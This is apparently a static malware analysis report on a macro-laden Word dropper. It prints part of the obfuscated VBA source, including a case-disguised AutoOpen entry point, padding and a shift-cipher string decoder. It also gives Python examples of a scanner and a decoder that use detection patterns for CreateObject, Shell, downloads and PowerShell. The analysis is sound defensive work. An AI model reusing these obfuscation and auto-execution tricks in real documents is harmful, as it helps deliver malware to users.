Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0592b4d2f76a5ec8…

MALICIOUS

Office (OLE)

Size: 67.0 KB | Created: 2018-06-13 10:06:00 | Authoring application: Microsoft Office Word | First seen: 2019-03-10
MD5: b2e0d468b82b1de92829817b1292907e
SHA-1: 2364a75570bab29a5ef1e780bae03f0ff6935f57
SHA-256: 0592b4d2f76a5ec84edf6f71a780f6501357f15fee60fbc019c96c1cfd59a881
Risk score: 282

Malware Insights

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1059.005 Command and Scripting Interpreter: Visual Basic
T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Word document in the OLE binary format carrying a VBA project. Its entry point is the procedure 'AutOOpen': VBA identifiers are case-insensitive, so Word treats it as the AutoOpen auto-execution macro and runs it as soon as macros are enabled, while a literal, case-sensitive match on 'AutoOpen' would miss it. The document body is a lure telling the user to click 'Enable Editing' and then 'Enable Content', which is what takes the file out of Protected View and lets the macro run. The recovered source is obfuscated in three visible ways. Every procedure is padded with repeated arithmetic assignments to 'avosanaF' that nothing ever reads (dead code that inflates and varies the file). Strings are not stored as literals but assembled at run time by 'time4465', 'hcivoknaM' and 'fugeptar' from pieces such as 'pawnpedc.zou543210' and 'shketenok.efortovo', which are control properties of UserForm modules (the 'chutuous' module, with its VB_Base GUIDs and '_Change' event stubs, is one such form), each piece passed through 'parania20' (presumably the string decoder; its body lies in the part of the source not shown in the preview). Finally, 'td966148' is a per-character shift cipher over a 91-entry symbol table 'achunips' read via 'button1969' (1-based index, wrapping by 91 when the index minus the shift drops to zero or below), which is what turns literals like "KHX@K##Kxn4H0&B/Z'B0'X\" into usable text. The CreateObject and CallByName findings are consistent with instantiating a COM object and invoking a method on it by name, but the decoded strings, and therefore the object used and any payload location, are not visible in the static listing. The 'Created' timestamp above comes from the document's own metadata and is under the author's control.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-6592226-0 (critical, CLAMAV_DETECTION)
    ClamAV signature match: Doc.Dropper.Agent-6592226-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    The document contains VBA macro code.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    An auto-execution procedure is present: 'AutOOpen', which VBA resolves case-insensitively to AutoOpen.
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    The macro instantiates COM objects through CreateObject. The call does not appear in the portion of the source previewed below, so it sits in the truncated remainder.
  • CallByName call (high, OLE_VBA_CALLBYNAME)
    The macro invokes methods late-bound by name through CallByName, which keeps the method name out of the plain-text source until run time.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only documents and documents whose source extraction fails, where no readable source is available.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, and this rule fires when no modern VBA project was recovered and no stronger macro-virus family marker was present. It is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the finding is redundant: olevba did recover a full VBA project (see Extracted artifacts below), so the marker is the same AutOOpen procedure already reported above, not a separate legacy-macro surface.
  • Macro/content-enable lure (medium, SE_ENABLE_LURE)
    The document instructs the user to enable editing and content. Protected View and the macro warning are not bypassed technically; the lure persuades the user to switch them off, which is how most macro droppers get their code to run.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace URI that Office writes into any document containing a drawing; it is not contacted at run time and is not an indicator.
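The heuristics above (case-insensitive auto-exec names, object creation and late binding, dead-code padding, strings stored in form-control properties) can be reproduced over the extracted source without the report engine. The script below is an added example, not the report engine's code and not oletools (which is what actually carved macros.bas); it is a stdlib-only scanner run over an abridged copy of the listing in Extracted artifacts, with one constructed procedure (constructed_demo) appended so the CreateObject check has something to match. The OLE_VBA_* rule IDs reuse the report's labels; VBA_DEAD_ARITHMETIC is a label made up here.

```python
import re
from collections import Counter

# Constructed input: abridged from the report's extracted listing (padding lines
# elided in two procedures). The last procedure, constructed_demo, is NOT in the
# sample and exists only so the object-creation check has something to match.
VBA_EXCERPT = r'''
Sub AutOOpen()
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
rebels111
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
End Sub
Function td966148(sugarjason As String, peekings As Integer) As String
honey433 = 0
For hfyfkgjr = 1 To 91
If (button1969(achunips, hfyfkgjr) = sugarjason) Then
   honey433 = hfyfkgjr
   avosanaF = 77 - 42
    Exit For
End If
Next hfyfkgjr
honey433 = IIf(honey433 - peekings <= 0, 91 + honey433 - peekings, honey433 - peekings)
td966148 = button1969(achunips, honey433)
End Function
Function time4465(ninurtnA)
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
time4465 = parania20(zylturve + pawnpedc.zou543210) + ninurtnA + _
parania20(pawnpedc.dniklediE) + ninurtnA + parania20(chutuous.Redrum66)
End Function
Function hcivoknaM(abcnewuser, lopeprom)
hcivoknaM = parania20(shketenok.efortovo) + lopeprom + parania20(shketenok.synplapu) + _
lopeprom + parania20(shketenok.avehcalukS) + abcnewuser + _
parania20(pawnpedc.puzsidba + bararues + pawnpedc.bondoxford) + abcnewuser + parania20(pawnpedc.puzsidba)
End Function
Function zylturve()
zylturve = "KHX@K##Kxn4H0&B/Z'B0'X\"
End Function
Sub constructed_demo()
Set obj = CreateObject(alphasix())
End Sub
'''

AUTOEXEC_NAMES = {"autoopen", "autoexec", "autoclose", "autonew", "auto_open",
                  "auto_close", "document_open", "document_close", "workbook_open"}
PROC_RE = re.compile(r'^\s*(?:(?:Public|Private|Friend)\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)',
                     re.I | re.M)
SUSPICIOUS_RE = re.compile(r'\b(CreateObject|GetObject|CallByName|Shell|Environ|URLDownloadToFile)\s*\(', re.I)
ARITH_ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*([\w\s+\-*/()]+?)\s*$')
MEMBER_RE = re.compile(r'\b([A-Za-z_]\w*)\.([A-Za-z_]\w*)\b')

def autoexec_procs(src):
    """Auto-run entry points. VBA identifiers are case-insensitive, so compare
    lower-cased: 'AutOOpen' is AutoOpen to Word; a literal grep misses it."""
    return [p for p in PROC_RE.findall(src) if p.lower() in AUTOEXEC_NAMES]

def suspicious_calls(src):
    return dict(Counter(m.group(1) for m in SUSPICIOUS_RE.finditer(src)))

def dead_arithmetic(src):
    """Variables only ever assigned integer arithmetic over themselves and never
    read by any other statement: padding, not logic."""
    lines = src.splitlines()
    own = {}
    for i, line in enumerate(lines):
        m = ARITH_ASSIGN_RE.match(line)
        if not m:
            continue
        var, rhs = m.group(1), m.group(2)
        if re.search(r'\d', rhs) and all(n == var for n in re.findall(r'[A-Za-z_]\w*', rhs)):
            own.setdefault(var, set()).add(i)
    dead = {}
    for var, idxs in own.items():
        pat = re.compile(r'\b' + re.escape(var) + r'\b')
        if not any(pat.search(l) for j, l in enumerate(lines) if j not in idxs):
            dead[var] = len(idxs)
    return dead

def member_string_sources(src):
    """Object.Member reads; in this sample the objects are UserForm modules whose
    control properties hold the encoded string pieces."""
    out = {}
    for obj, member in MEMBER_RE.findall(src):
        out.setdefault(obj, set()).add(member)
    return {obj: sorted(m) for obj, m in out.items()}

def scan_vba(src):
    report = {"autoexec": autoexec_procs(src), "suspicious_calls": suspicious_calls(src),
              "dead_arithmetic": dead_arithmetic(src),
              "member_string_sources": member_string_sources(src)}
    calls = {c.lower() for c in report["suspicious_calls"]}
    rules = ["OLE_VBA_AUTOOPEN"] if report["autoexec"] else []
    rules += ["OLE_VBA_CREATEOBJ"] if "createobject" in calls else []
    rules += ["OLE_VBA_CALLBYNAME"] if "callbyname" in calls else []
    rules += ["VBA_DEAD_ARITHMETIC"] if report["dead_arithmetic"] else []  # label made up here
    report["rules"] = rules
    return report
```

Run scan_vba(VBA_EXCERPT): the auto-exec check returns 'AutOOpen' because names are compared lower-cased; 'avosanaF' is reported as dead padding while 'honey433', which is also assigned a bare integer, is not, because other statements read it; and the member-reference pass groups the string pieces under the three form modules ('pawnpedc', 'shketenok', 'chutuous') that this sample uses as its string store.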

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8400 bytes
SHA-256: a403669054739a47912518b709f473f72395c78afb2abaf92c599414b653e118

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
rebels111
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
End Sub

Attribute VB_Name = "automag0"
Function td966148(sugarjason As String, peekings As Integer) As String
honey433 = 0
For hfyfkgjr = 1 To 91
If (button1969(achunips, hfyfkgjr) = sugarjason) Then
   honey433 = hfyfkgjr
   avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
    Exit For
End If
Next hfyfkgjr
honey433 = IIf(honey433 - peekings <= 0, 91 + honey433 - peekings, honey433 - peekings)
td966148 = button1969(achunips, honey433)
End Function

Function alphasix()
alphasix = halbernie.iiksnivelO
End Function

Function time4465(ninurtnA)
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
time4465 = parania20(zylturve + pawnpedc.zou543210) + ninurtnA + _
parania20(pawnpedc.dniklediE) + ninurtnA + parania20(chutuous.Redrum66)
End Function

Function hcivoknaM(abcnewuser, lopeprom)
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
hcivoknaM = parania20(shketenok.efortovo) + lopeprom + parania20(shketenok.synplapu) + _
lopeprom + parania20(shketenok.avehcalukS) + abcnewuser + _
parania20(pawnpedc.puzsidba + bararues + pawnpedc.bondoxford) + abcnewuser + parania20(pawnpedc.puzsidba)
End Function

Function zylturve()
zylturve = "KHX@K##Kxn4H0&B/Z'B0'X\"
End Function



Attribute VB_Name = "chutuous"
Attribute VB_Base = "0{91ED7AD8-A290-4A60-8543-B6E71719EFDA}{52491492-3CED-4A3A-B342-45652BC2072F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub ANINAHIT_Change()
MsgBox "OK"
End Sub

Private Sub ECNERUAL_Change()
AVONIDHSULAMAK = forceste(shitmagnum)
boristandy = forceste(shitmagnum)
IONHSUROB = forceste(halfachu)
poiuyt1088 = forceste(halfachu)
lestat1970 = 86 + 48
lestat1970 = 15 * 4
lestat1970 = lestat1970 - 88 * 39 + lestat197
lestat1970 = 100 - 98 + 2
lestat1970 = 87 + lestat1970 + 3
letterking AVONIDHSULAMAK, boristandy, IONHSUROB, poiuyt1088
End Sub

Private Sub Redrum66_Change()

End Sub

Private Sub sphenher_Change()

End Sub

Attribute VB_Name = "everythi"
Function fugeptar(AYNTAYMAZ, weedcute)
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
fugeptar = parania20(halbernie.APRIL1037) + AYNTAYMAZ + parania20(shketenok.april1407) + _
 weedcute + parania20(halbernie.mimiflip + halbernie.Golubie_Gl) + weedcute
End Function

Function bararues()
bararues = "'K44#KxM2nxHnrH0&B/Z'B0'X\"
End Function

Function gismgetb(raftSystems, tleanatc)
gismgetb = elsiepedro(Int((raftSystems * leonlock()) + tleanatc))
End Function

Function elsiepedro(paulzombie)
avosanaF = 77 - 42
avosanaF = 77 + 8 * 72 - 1
avosanaF = 41 - avosanaF + 80 + avosanaF * 8
avosanaF = avosanaF + 40 - 49 * 27 + 6
avosanaF = 28 - 30 + 4
avosanaF = 62 * 50 - 7
elsiepedro = CInt(paulzombie)
End Function

Function shitmagnum()
shitmagnum = pawnpedc.cocowawa
End Function

Function halfachu()
halfachu = halbernie.icemantara
End Function


Attribute VB_Name = "halbernie"
Attribute VB_Base = "0{35CC
... (truncated)
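The td966148 routine in the listing above decodes one symbol at a time: it finds the symbol's 1-based position in a 91-entry table (button1969(achunips, i)), subtracts the shift peekings, adds 91 if the result drops to zero or below, and returns the table entry at that position. The block below is an added example, not the sample's code and not a tool's: a line-for-line Python port of that routine, plus the brute force an analyst runs when the shift is unknown. The table 'achunips' is not in the preview, so ALPHABET is an assumed stand-in, and KEYWORDS, score, encode and brute_force are this example's additions used to build and rank test vectors.

```python
import string

# ASSUMED alphabet: the sample's real 91-symbol table lives in 'achunips' and is
# read through 'button1969', neither of which is in the preview, so a stand-in is
# used here: the first 91 of ASCII letters, digits and punctuation.
ALPHABET = (string.ascii_letters + string.digits + string.punctuation)[:91]

def td966148(sugarjason, peekings, alphabet=ALPHABET):
    """Port of the macro's per-character routine, keeping its 1-based index,
    its '<= 0 then add 91' wrap and its silent handling of unknown symbols."""
    if not 0 <= peekings <= 91:          # guard added here; the macro has none
        raise ValueError("shift out of range")
    honey433 = 0
    for hfyfkgjr in range(1, 92):        # For hfyfkgjr = 1 To 91
        if alphabet[hfyfkgjr - 1] == sugarjason:   # button1969(achunips, i)
            honey433 = hfyfkgjr
            break
    # A symbol missing from the table leaves honey433 at 0, so the macro emits
    # the entry at position 91 - shift for it instead of failing.
    if honey433 - peekings <= 0:
        honey433 = 91 + honey433 - peekings
    else:
        honey433 = honey433 - peekings
    return alphabet[honey433 - 1]

def decode(blob, shift, alphabet=ALPHABET):
    return "".join(td966148(c, shift, alphabet) for c in blob)

def encode(text, shift, alphabet=ALPHABET):
    """Inverse of decode; not in the sample, used only to build a known-answer vector."""
    return "".join(alphabet[(alphabet.index(c) + shift) % 91] for c in text)

# Tokens that make a candidate plaintext look like macro/loader code (assumed list).
KEYWORDS = ("CreateObject", "WScript", "Shell", "http", ".exe", "powershell")

def score(candidate):
    """Plausibility: one point per letter, twenty per keyword hit."""
    return sum(c.isalpha() for c in candidate) + \
        sum(20 for k in KEYWORDS if k.lower() in candidate.lower())

def brute_force(blob, alphabet=ALPHABET):
    """Shift 0 and 91 are both the identity, so 1..90 is the whole key space.
    Returns every (shift, plaintext) candidate, most plausible first."""
    cands = [(s, decode(blob, s, alphabet)) for s in range(1, 91)]
    return sorted(cands, key=lambda sc: score(sc[1]), reverse=True)
```

Feeding the literal from zylturve ("KHX@K##Kxn4H0&B/Z'B0'X\") to brute_force with the stand-in alphabet yields 90 candidates and none of them is meaningful, which is the practical lesson: the shift is only half the key, and until achunips itself is recovered from the rest of the source (or the macro is run in an instrumented sandbox) the strings stay opaque. With the right table, the 90-way brute force is cheap enough that the per-string shift value never needs to be located in the code.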